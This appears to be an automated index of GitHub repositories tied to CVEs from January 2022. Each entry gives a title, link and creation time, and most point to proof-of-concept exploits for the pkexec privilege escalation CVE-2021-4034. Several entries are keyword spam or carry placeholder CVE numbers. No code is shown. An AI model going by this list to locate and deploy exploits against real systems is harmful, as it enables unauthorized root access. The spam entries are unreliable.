**PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)** : [OxWeb4/CVE-2021-4034-](https://github.com/OxWeb4/CVE-2021-4034-) create time: 2022-01-29T22:28:52Z

**PwnKit - Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)** : [TW-D/PwnKit-Vulnerability_CVE-2021-4034](https://github.com/TW-D/PwnKit-Vulnerability_CVE-2021-4034) create time: 2022-01-29T19:59:24Z

**Exploit for the PwnKit Vulnerability** : [v-rzh/CVE-2021-4034](https://github.com/v-rzh/CVE-2021-4034) create time: 2022-01-29T15:07:50Z

**no description** : [jdordonezn/CVE-2022-24032](https://github.com/jdordonezn/CVE-2022-24032) create time: 2022-01-29T14:25:03Z

**Log4j 1.2 project, stripped of the additional appenders and CVEs that cause problems (CVE-2019-17571, CVE-2020-9488, CVE-2021-4104, CVE-2022-23302, CVE-2022-23305 and CVE-2022-23307)** : [Schnitker/log4j-min](https://github.com/Schnitker/log4j-min) create time: 2022-01-29T14:03:35Z

**Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`** : [michalbednarski/ReparcelBug2](https://github.com/michalbednarski/ReparcelBug2) create time: 2022-01-29T10:14:32Z

**Check CVE-2021-4034 vulnerability** : [codiobert/pwnkit-scanner](https://github.com/codiobert/pwnkit-scanner) create time: 2022-01-29T09:03:34Z

**no description** : [nxiwmd/CVE-2022-test](https://github.com/nxiwmd/CVE-2022-test) create time: 2022-01-29T08:41:05Z

**centos 6.10的rpm包,修复CVE-2021-4034 漏洞** : [sofire/polkit-0.96-CVE-2021-4034](https://github.com/sofire/polkit-0.96-CVE-2021-4034) create time: 2022-01-29T06:54:49Z

**CVE-2013-3660的x64 win7平台EXP源代码,成功率100%。** : [ExploitCN/CVE-2013-3660-x64-WIN7](https://github.com/ExploitCN/CVE-2013-3660-x64-WIN7) create time: 2022-01-29T02:14:26Z

**no description** : [CyberSecurityUP/CVE-2018-0114-Exploit](https://github.com/CyberSecurityUP/CVE-2018-0114-Exploit) create time: 2022-01-29T02:04:44Z

**Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214.** : [Anonymous-Family/CVE-2017-0213](https://github.com/Anonymous-Family/CVE-2017-0213) create time: 2022-01-29T00:36:46Z

**Local privilege escalation vulnerability for polkit's pkexec utility** : [glowbase/CVE-2021-4034](https://github.com/glowbase/CVE-2021-4034) create time: 2022-01-28T23:36:36Z

**no description** : [NaturalT314/CVE-2018-16763](https://github.com/NaturalT314/CVE-2018-16763) create time: 2022-01-28T21:30:27Z

**BASH file, no download capabilties? Copy and paste it!** : [n3onhacks/CVE-2021-4034](https://github.com/n3onhacks/CVE-2021-4034) create time: 2022-01-28T18:12:54Z

**no description** : [qq224015/CVE-2021-4034](https://github.com/qq224015/CVE-2021-4034) create time: 2022-01-28T16:50:45Z

**pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034** : [Kirill89/CVE-2021-4034](https://github.com/Kirill89/CVE-2021-4034) create time: 2022-01-28T15:16:44Z

**CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation** : [Rvn0xsy/CVE-2021-4034](https://github.com/Rvn0xsy/CVE-2021-4034) create time: 2022-01-28T15:13:28Z

**CVE-2021-4034** : [oreosec/pwnkit](https://github.com/oreosec/pwnkit) create time: 2022-01-28T13:51:17Z

**vulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034** : [0xalwayslucky/log4j-polkit-poc](https://github.com/0xalwayslucky/log4j-polkit-poc) create time: 2022-01-27T19:54:16Z

**no description** : [CYB3RK1D/CVE-2021-4034-POC](https://github.com/CYB3RK1D/CVE-2021-4034-POC) create time: 2022-01-28T14:04:58Z

**CVE-2021-4034** : [Sakura-nee/CVE-2021-4034](https://github.com/Sakura-nee/CVE-2021-4034) create time: 2022-01-28T13:38:24Z

**PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)** : [Pr0f3ssor/CVE-2021-4034](https://github.com/Pr0f3ssor/CVE-2021-4034) create time: 2022-01-28T13:06:45Z

**no description** : [Yakumwamba/POC-CVE-2021-4034](https://github.com/Yakumwamba/POC-CVE-2021-4034) create time: 2022-01-28T13:04:22Z

**no description** : [galoget/PwnKit-CVE-2021-4034](https://github.com/galoget/PwnKit-CVE-2021-4034) create time: 2022-01-28T12:08:25Z

**Exploit for Local Privilege Escalation Vulnerability in polkit’s pkexec** : [JoyGhoshs/CVE-2021-4034](https://github.com/JoyGhoshs/CVE-2021-4034) create time: 2022-01-28T07:21:40Z

**Exploit for the PwnKit vulnerability, CVE-2021-4034** : [jpmcb/pwnkit-go](https://github.com/jpmcb/pwnkit-go) create time: 2022-01-28T04:24:20Z

**no description** : [n3onhacks/CVE-2021-4034-BASH-One-File-Exploit](https://github.com/n3onhacks/CVE-2021-4034-BASH-One-File-Exploit) create time: 2022-01-28T03:58:34Z

**no description** : [pengalaman-1t/CVE-2021-4034](https://github.com/pengalaman-1t/CVE-2021-4034) create time: 2022-01-28T03:19:57Z

**no description** : [EstamelGG/CVE-2021-4032-NoGCC](https://github.com/EstamelGG/CVE-2021-4032-NoGCC) create time: 2022-01-28T02:54:38Z

**no description** : [genjix2/CVE-2020-29599](https://github.com/genjix2/CVE-2020-29599) create time: 2022-01-28T01:45:07Z

**Prestashop >= 1.7.5.0 < 1.7.8.2 - SQL injection** : [numanturle/CVE-2021-43789](https://github.com/numanturle/CVE-2021-43789) create time: 2022-01-28T00:26:40Z

**no description** : [MedKH1684/Pwnkit-CVE-2021-4034](https://github.com/MedKH1684/Pwnkit-CVE-2021-4034) create time: 2022-01-27T19:37:54Z

**Single shell script to download and make berdav CVE-2021-4034 polkit exploit and see if your system is affected** : [10100programer/CVE-2021-4034-Quick-Check](https://github.com/10100programer/CVE-2021-4034-Quick-Check) create time: 2022-01-27T16:25:07Z

**Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.** : [86x/CVE-2021-45416](https://github.com/86x/CVE-2021-45416) create time: 2022-01-27T18:34:00Z

**Exploit for pkexec (CVE-2021-4034)** : [Fato07/Pwnkit-exploit](https://github.com/Fato07/Pwnkit-exploit) create time: 2022-01-27T17:46:07Z

**Pre-compiled builds for CVE-2021-4034** : [c3c/CVE-2021-4034](https://github.com/c3c/CVE-2021-4034) create time: 2022-01-27T17:43:24Z

**Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689** : [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009) create time: 2022-01-27T17:16:35Z

**no description** : [BrunoPincho/cve-2018-16763-rust](https://github.com/BrunoPincho/cve-2018-16763-rust) create time: 2022-01-27T17:04:04Z

**Linux LPE using polkit-1 written in Rust.** : [deoxykev/CVE-2021-4024-Rust](https://github.com/deoxykev/CVE-2021-4024-Rust) create time: 2022-01-27T16:28:56Z

**Exploit PoC for the polkit pkexec (PWNKIT) vulnerability** : [rayheffer/CVE-2021-4034](https://github.com/rayheffer/CVE-2021-4034) create time: 2022-01-27T16:15:21Z

**no description** : [khaclep007/CVE-2022-0185](https://github.com/khaclep007/CVE-2022-0185) create time: 2022-01-27T16:24:35Z

**Proof of Concept for CVE-2021-4034** : [DosAmp/pkwned](https://github.com/DosAmp/pkwned) create time: 2022-01-27T14:40:50Z

**CVE-2021-4034 PoC , polkit < 0.131** : [tahaafarooq/poppy](https://github.com/tahaafarooq/poppy) create time: 2022-01-27T14:29:55Z

**no description** : [nawed20002/CVE-2021-46005](https://github.com/nawed20002/CVE-2021-46005) create time: 2022-01-27T13:18:16Z

**LSM BPF module to block pwnkit (CVE-2021-4034) like exploits** : [evdenis/lsm_bpf_check_argc0](https://github.com/evdenis/lsm_bpf_check_argc0) create time: 2022-01-27T10:26:46Z

**Python exploit for CVE-2021-4034** : [Plethore/CVE-2021-4034](https://github.com/Plethore/CVE-2021-4034) create time: 2022-01-27T10:05:09Z

**This is a POC for the vulnerability found in polkit's pkexec binary which is used to run programs as another users.** : [luckythandel/CVE-2021-4034](https://github.com/luckythandel/CVE-2021-4034) create time: 2022-01-27T09:42:18Z

**no description** : [0xTRAW/CVE-2021-4034](https://github.com/0xTRAW/CVE-2021-4034) create time: 2022-01-27T09:35:54Z

**PoC CVE 2021-4034 PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec** : [NiS3x/CVE-2021-4034](https://github.com/NiS3x/CVE-2021-4034) create time: 2022-01-27T08:28:56Z

**no description** : [nikip72/CVE-2021-4034](https://github.com/nikip72/CVE-2021-4034) create time: 2022-01-27T08:14:55Z

**no description** : [puckiestyle/CVE-2021-4034](https://github.com/puckiestyle/CVE-2021-4034) create time: 2022-01-27T07:19:17Z

**CVE-2021-44228** : [ThanhHien98/CVE-2021-44228](https://github.com/ThanhHien98/CVE-2021-44228) create time: 2022-01-27T07:07:30Z

**CVE-2021-44228** : [ThanhHien98/Log4j](https://github.com/ThanhHien98/Log4j) create time: 2022-01-27T06:29:06Z

**CVE-2021-44228** : [ThanhHien98/Log4j](https://github.com/ThanhHien98/Log4j) create time: 2022-01-27T04:05:03Z

**win32k LPE** : [KaLendsi/CVE-2022-21882](https://github.com/KaLendsi/CVE-2022-21882) create time: 2022-01-27T03:44:10Z

**no description** : [w1023913214/CVE-2022-962322](https://github.com/w1023913214/CVE-2022-962322) create time: 2022-01-27T03:15:13Z

**CVE-2021-3156 POC and Docker and Analysis write up** : [chenaotian/CVE-2021-3156](https://github.com/chenaotian/CVE-2021-3156) create time: 2022-01-27T02:31:43Z

**Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)** : [Al1ex/CVE-2021-4034](https://github.com/Al1ex/CVE-2021-4034) create time: 2022-01-27T02:27:15Z

**A simple proof-of-concept for CVE-2021-4034 (pkexec local privilege escalation)** : [cd80-ctf/CVE-2021-4034](https://github.com/cd80-ctf/CVE-2021-4034) create time: 2022-01-27T01:14:11Z

**no description** : [w1023913214/CVE-2022-9632](https://github.com/w1023913214/CVE-2022-9632) create time: 2022-01-27T01:54:10Z

**Write-up of CVE-2022-22828** : [videnlabs/CVE-2022-22828](https://github.com/videnlabs/CVE-2022-22828) create time: 2022-01-27T00:29:47Z

**no description** : [T3cnokarita/CVE-2021-4034](https://github.com/T3cnokarita/CVE-2021-4034) create time: 2022-01-26T23:46:28Z

**PoC for PwnKit: LPE in polkit's pkexec https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034** : [0xBruno/CVE-2021-4034](https://github.com/0xBruno/CVE-2021-4034) create time: 2022-01-26T23:58:19Z

**POC for CVE-2021-4034** : [callrbx/pkexec-lpe-poc](https://github.com/callrbx/pkexec-lpe-poc) create time: 2022-01-26T20:52:32Z

**Polkit pkexec CVE-2021-4034 Proof Of Concept** : [nobelh/CVE-2020-4034](https://github.com/nobelh/CVE-2020-4034) create time: 2022-01-26T20:32:10Z

**no description** : [vilasboasph/CVE-2021-4034](https://github.com/vilasboasph/CVE-2021-4034) create time: 2022-01-26T19:46:19Z

**no description** : [hackingyseguridad/CVE-2021-4034](https://github.com/hackingyseguridad/CVE-2021-4034) create time: 2022-01-26T19:36:38Z

**no description** : [jdordonezn/CVE-2022-22919](https://github.com/jdordonezn/CVE-2022-22919) create time: 2022-01-26T19:45:27Z

**no description** : [phvilasboas/CVE-2021-4034](https://github.com/phvilasboas/CVE-2021-4034) create time: 2022-01-26T19:04:55Z

**Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.** : [Anonymous-Family/CVE-2021-4034](https://github.com/Anonymous-Family/CVE-2021-4034) create time: 2022-01-26T18:53:47Z

**CVE-2021-4034** : [luijait/PwnKit-Exploit](https://github.com/luijait/PwnKit-Exploit) create time: 2022-01-26T18:01:26Z

**TightVNC Vulnerability.** : [MaherAzzouzi/CVE-2022-23967](https://github.com/MaherAzzouzi/CVE-2022-23967) create time: 2022-01-26T18:49:43Z

**Python exploit code for CVE-2021-4034 (pwnkit)** : [joeammond/CVE-2021-4034](https://github.com/joeammond/CVE-2021-4034) create time: 2022-01-26T17:53:16Z

**no description** : [robemmerson/CVE-2021-4034](https://github.com/robemmerson/CVE-2021-4034) create time: 2022-01-26T17:49:58Z

**CVE-2021-4034 POC exploit** : [PeterGottesman/pwnkit-exploit](https://github.com/PeterGottesman/pwnkit-exploit) create time: 2022-01-26T16:04:37Z

**no description** : [zcrosman/cve-2021-4034](https://github.com/zcrosman/cve-2021-4034) create time: 2022-01-26T17:07:26Z

**no description** : [dadvlingd/-CVE-2021-4034](https://github.com/dadvlingd/-CVE-2021-4034) create time: 2022-01-26T16:43:18Z

**An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec** : [whokilleddb/CVE-2021-4034](https://github.com/whokilleddb/CVE-2021-4034) create time: 2022-01-26T16:18:10Z

**PoC for cve-2021-4034** : [mike-artemis/cve-2021-4034](https://github.com/mike-artemis/cve-2021-4034) create time: 2022-01-26T16:11:40Z

**no description** : [sunny0day/CVE-2021-4034](https://github.com/sunny0day/CVE-2021-4034) create time: 2022-01-26T16:05:47Z

**CVE-2021-4034 in Bash Script** : [azminawwar/CVE-2021-4034](https://github.com/azminawwar/CVE-2021-4034) create time: 2022-01-26T15:56:15Z

**Proof of Concept for CVE-2021-4034 Polkit Privilege Escalation** : [Immersive-Labs-Sec/CVE-2021-4034](https://github.com/Immersive-Labs-Sec/CVE-2021-4034) create time: 2022-01-26T08:25:41Z

**no description** : [discordianfish/cve-2022-0185-crash-poc](https://github.com/discordianfish/cve-2022-0185-crash-poc) create time: 2022-01-26T16:27:50Z

**低调证明** : [xcanwin/CVE-2021-4034-UniontechOS](https://github.com/xcanwin/CVE-2021-4034-UniontechOS) create time: 2022-01-26T15:07:07Z

**no description** : [fdellwing/CVE-2021-4034](https://github.com/fdellwing/CVE-2021-4034) create time: 2022-01-26T14:59:37Z

**no description** : [san3ncrypt3d/CVE-2021-4034-POC](https://github.com/san3ncrypt3d/CVE-2021-4034-POC) create time: 2022-01-26T14:40:27Z

**Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation** : [ly4k/PwnKit](https://github.com/ly4k/PwnKit) create time: 2022-01-26T14:26:10Z

**Simple POC Code** : [binksjar/cve-2021-4034](https://github.com/binksjar/cve-2021-4034) create time: 2022-01-26T14:22:33Z

**no description** : [1nf1n17yk1ng/CVE-2021-4034](https://github.com/1nf1n17yk1ng/CVE-2021-4034) create time: 2022-01-26T13:45:17Z

**PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120.** : [c3l3si4n/pwnkit](https://github.com/c3l3si4n/pwnkit) create time: 2022-01-26T13:34:01Z

**no description** : [jostmart/-CVE-2021-4034](https://github.com/jostmart/-CVE-2021-4034) create time: 2022-01-26T12:44:22Z

**PoC Exploit for CVE-2015-3306** : [7unn3l/CVE-2015-3306-PoC](https://github.com/7unn3l/CVE-2015-3306-PoC) create time: 2022-01-26T12:03:12Z

**A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and not earlier versions. Credits to: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773** : [m96dg/CVE-2021-41773-exercise](https://github.com/m96dg/CVE-2021-41773-exercise) create time: 2022-01-26T11:02:46Z

**cve-2022-21907** : [corelight/cve-2022-21907](https://github.com/corelight/cve-2022-21907) create time: 2022-01-11T05:00:55Z

**Pseudo patch for CVE-2021-4034** : [moldabekov/CVE-2021-4034](https://github.com/moldabekov/CVE-2021-4034) create time: 2022-01-26T11:02:29Z

**CVE-2021-4034 POC and Docker and Analysis write up** : [chenaotian/CVE-2021-4034](https://github.com/chenaotian/CVE-2021-4034) create time: 2022-01-26T10:58:23Z

**no description** : [aus-mate/CVE-2021-4034-POC](https://github.com/aus-mate/CVE-2021-4034-POC) create time: 2022-01-26T10:39:27Z

**A stupid poc for CVE-2021-4034** : [LukeGix/CVE-2021-4034](https://github.com/LukeGix/CVE-2021-4034) create time: 2022-01-26T10:36:35Z

**Dirty PoC for CVE-2021-4034 (Pwnkit)** : [Nero22k/CVE-2021-4034](https://github.com/Nero22k/CVE-2021-4034) create time: 2022-01-26T10:22:43Z

**Just a sh script file to CVE-2021-4034** : [N1et/CVE-2021-4034](https://github.com/N1et/CVE-2021-4034) create time: 2022-01-26T09:46:35Z

**A python3 PoC for CVE-2021-4034 by Kim Schulz** : [kimusan/pkwner](https://github.com/kimusan/pkwner) create time: 2022-01-26T08:43:15Z

**debian** : [SmithCGauss/CVE-2016-5195](https://github.com/SmithCGauss/CVE-2016-5195) create time: 2022-01-26T08:22:32Z

**no description** : [J0hnbX/CVE-2021-4034-new](https://github.com/J0hnbX/CVE-2021-4034-new) create time: 2022-01-26T08:05:54Z

**polkit pkexec Local Privilege Vulnerability to Add custom commands** : [zhzyker/CVE-2021-4034](https://github.com/zhzyker/CVE-2021-4034) create time: 2022-01-26T07:19:21Z

**no description** : [lsw29475/CVE-2020-9715](https://github.com/lsw29475/CVE-2020-9715) create time: 2022-01-10T08:23:05Z

**This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240.** : [omarothmann/Embedded-Backdoor-Connection](https://github.com/omarothmann/Embedded-Backdoor-Connection) create time: 2022-01-26T05:59:52Z

**my PoC** : [0x05a/my-cve-2021-4034-poc](https://github.com/0x05a/my-cve-2021-4034-poc) create time: 2022-01-26T06:00:49Z

**no description** : [wongwaituck/CVE-2021-4034](https://github.com/wongwaituck/CVE-2021-4034) create time: 2022-01-26T05:44:44Z

**no description** : [ayypril/CVE-2021-4034](https://github.com/ayypril/CVE-2021-4034) create time: 2022-01-26T05:42:40Z

**A Golang implementation of clubby789's implementation of CVE-2021-4034** : [An00bRektn/CVE-2021-4034](https://github.com/An00bRektn/CVE-2021-4034) create time: 2022-01-26T04:58:16Z

**no description** : [Y3A/CVE-2021-4034](https://github.com/Y3A/CVE-2021-4034) create time: 2022-01-26T04:05:50Z

**Exploit for CVE-2021-4034** : [Ayrx/CVE-2021-4034](https://github.com/Ayrx/CVE-2021-4034) create time: 2022-01-26T03:33:47Z

**CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept** : [mebeim/CVE-2021-4034](https://github.com/mebeim/CVE-2021-4034) create time: 2022-01-26T03:20:18Z

**CVE-2021-4034** : [signfind/CVE-2021-4034](https://github.com/signfind/CVE-2021-4034) create time: 2022-01-26T02:21:08Z

**PoC for CVE-2021-4034** : [nikaiw/CVE-2021-4034](https://github.com/nikaiw/CVE-2021-4034) create time: 2022-01-26T02:02:25Z

**PoC for CVE-2021-4034 dubbed pwnkit** : [dzonerzy/poc-cve-2021-4034](https://github.com/dzonerzy/poc-cve-2021-4034) create time: 2022-01-26T01:34:44Z

**CVE-2021-4034 🎧** : [Audiobahn/CVE-2021-4034](https://github.com/Audiobahn/CVE-2021-4034) create time: 2022-01-26T01:09:32Z

**Bash implementation of CVE-2021-4034** : [JohnHammond/CVE-2021-4034](https://github.com/JohnHammond/CVE-2021-4034) create time: 2022-01-26T01:05:55Z

**PoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)** : [arthepsy/CVE-2021-4034](https://github.com/arthepsy/CVE-2021-4034) create time: 2022-01-26T00:56:36Z

**no description** : [gbrsh/CVE-2021-4034](https://github.com/gbrsh/CVE-2021-4034) create time: 2022-01-26T00:53:19Z

**no description** : [clubby789/CVE-2021-4034](https://github.com/clubby789/CVE-2021-4034) create time: 2022-01-26T00:28:52Z

**CVE-2021-4034 1day** : [berdav/CVE-2021-4034](https://github.com/berdav/CVE-2021-4034) create time: 2022-01-25T23:51:37Z

**impromptu pwn chal** : [lourkeur/cve-2021-4034-playground](https://github.com/lourkeur/cve-2021-4034-playground) create time: 2022-01-25T23:37:29Z

**Local Privilege Escalation in polkit's pkexec** : [ryaagard/CVE-2021-4034](https://github.com/ryaagard/CVE-2021-4034) create time: 2022-01-25T23:11:30Z

**no description** : [numanturle/CVE-2022-0332](https://github.com/numanturle/CVE-2022-0332) create time: 2022-01-25T23:58:17Z

**Created to assist in the automated deployment of Dell BIOS updates for devices affected by CVE-2021-21571, CVE-2021-21572, CVE-2021-21573 and CVE-2021-21574** : [hawksj/dell-biosconnect-fix](https://github.com/hawksj/dell-biosconnect-fix) create time: 2022-01-25T16:34:35Z

**Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion** : [Mr-xn/CVE-2022-21371](https://github.com/Mr-xn/CVE-2022-21371) create time: 2022-01-25T14:50:29Z

**CVE-2021-40346 - HaProxy HTTP request smuggling through integer overflow** : [alexOarga/CVE-2021-40346](https://github.com/alexOarga/CVE-2021-40346) create time: 2022-01-24T22:16:39Z

**no description** : [jcarabantes/CVE-2022-23046](https://github.com/jcarabantes/CVE-2022-23046) create time: 2022-01-22T13:35:40Z

**no description** : [w1023913214/CVE-2021-test](https://github.com/w1023913214/CVE-2021-test) create time: 2022-01-24T11:56:32Z

**no description** : [CycloneOrg/CVE_2022_21907-poc](https://github.com/CycloneOrg/CVE_2022_21907-poc) create time: 2022-01-24T10:04:58Z

**no description** : [w1023913214/CVE-2022-123456789](https://github.com/w1023913214/CVE-2022-123456789) create time: 2022-01-24T08:41:10Z

**no description** : [w1023913214/CVE-2022-3666](https://github.com/w1023913214/CVE-2022-3666) create time: 2022-01-24T08:25:59Z

**no description** : [w1023913214/CVE-2022-33332](https://github.com/w1023913214/CVE-2022-33332) create time: 2022-01-24T07:29:29Z

**A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX/vCenter/NSX/Horizon/vRealize Operations Manager** : [NS-Sp4ce/Vm4J](https://github.com/NS-Sp4ce/Vm4J) create time: 2021-12-28T01:37:20Z

**test** : [w1023913214/CVE-2022](https://github.com/w1023913214/CVE-2022) create time: 2022-01-24T03:06:51Z

**Exploit and Demo system for CVE-2021-3156** : [sharkmoos/Baron-Samedit](https://github.com/sharkmoos/Baron-Samedit) create time: 2021-11-01T15:30:41Z

**no description** : [Sant268/CVE-2022-22852](https://github.com/Sant268/CVE-2022-22852) create time: 2022-01-23T16:01:49Z

**no description** : [Sant268/CVE-2022-22851](https://github.com/Sant268/CVE-2022-22851) create time: 2022-01-23T16:01:26Z

**no description** : [Sant268/CVE-2022-22850](https://github.com/Sant268/CVE-2022-22850) create time: 2022-01-23T16:00:34Z

**CVE-2022-21907 Vulnerability PoC** : [michelep/CVE-2022-21907-Vulnerability-PoC](https://github.com/michelep/CVE-2022-21907-Vulnerability-PoC) create time: 2022-01-23T14:25:12Z

**对1909下windows版本的EXP进行分析,并对代码添加调试和注释** : [ExploitCN/CVE-2021-1732-EXP-](https://github.com/ExploitCN/CVE-2021-1732-EXP-) create time: 2022-01-23T12:40:01Z

**no description** : [LazyTitan33/CVE-2021-22204](https://github.com/LazyTitan33/CVE-2021-22204) create time: 2022-01-23T10:14:31Z

**Strapi CMS 3.0.0-beta.17.4 - Unauthenticated Remote Code Execution (CVE-2019-18818, CVE-2019-19609)** : [glowbase/CVE-2019-19609](https://github.com/glowbase/CVE-2019-19609) create time: 2022-01-23T05:28:51Z

**no description** : [elkassimyhajar/CVE-2018-16809](https://github.com/elkassimyhajar/CVE-2018-16809) create time: 2022-01-21T12:37:40Z

**All Details about CVE-2022-22296** : [vlakhani28/CVE-2022-22296](https://github.com/vlakhani28/CVE-2022-22296) create time: 2022-01-21T09:29:21Z

**Public disclosure & writeup of CVE-2021-44593.** : [Mister-Joe/CVE-2021-44593](https://github.com/Mister-Joe/CVE-2021-44593) create time: 2022-01-21T08:36:25Z

**cve-2022-2001 update** : [git-cve-updater/cve-2022-2001](https://github.com/git-cve-updater/cve-2022-2001) create time: 2022-01-21T06:29:28Z

**mysql://root:[email protected] \n exploit** : [git-cve-updater/cve-2022-2002](https://github.com/git-cve-updater/cve-2022-2002) create time: 2022-01-21T06:32:07Z

**cve update exploit poc rce sqli code cve-2022-3048 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3048](https://github.com/git-cve-updater/cve-2022-3048) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3046 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3046](https://github.com/git-cve-updater/cve-2022-3046) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3044 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3044](https://github.com/git-cve-updater/cve-2022-3044) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3060 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3060](https://github.com/git-cve-updater/cve-2022-3060) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3050 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3050](https://github.com/git-cve-updater/cve-2022-3050) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3052 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3052](https://github.com/git-cve-updater/cve-2022-3052) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3054 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3054](https://github.com/git-cve-updater/cve-2022-3054) create time: 2022-01-21T07:04:41Z

**cve update exploit poc rce sqli code cve-2022-3034 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3034](https://github.com/git-cve-updater/cve-2022-3034) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3036 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3036](https://github.com/git-cve-updater/cve-2022-3036) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3038 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3038](https://github.com/git-cve-updater/cve-2022-3038) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3030 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3030](https://github.com/git-cve-updater/cve-2022-3030) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3028 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3028](https://github.com/git-cve-updater/cve-2022-3028) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3040 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3040](https://github.com/git-cve-updater/cve-2022-3040) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3042 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3042](https://github.com/git-cve-updater/cve-2022-3042) create time: 2022-01-21T07:04:39Z

**cve update exploit poc rce sqli code cve-2022-3024 Log4j jndi rmi `mysql://root:[email protected]` 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve** : [git-cve-updater/cve-2022-3024](https://github.com/git-cve-updater/cve-2022-3024) create time: 2022-01-21T07:04:39Z

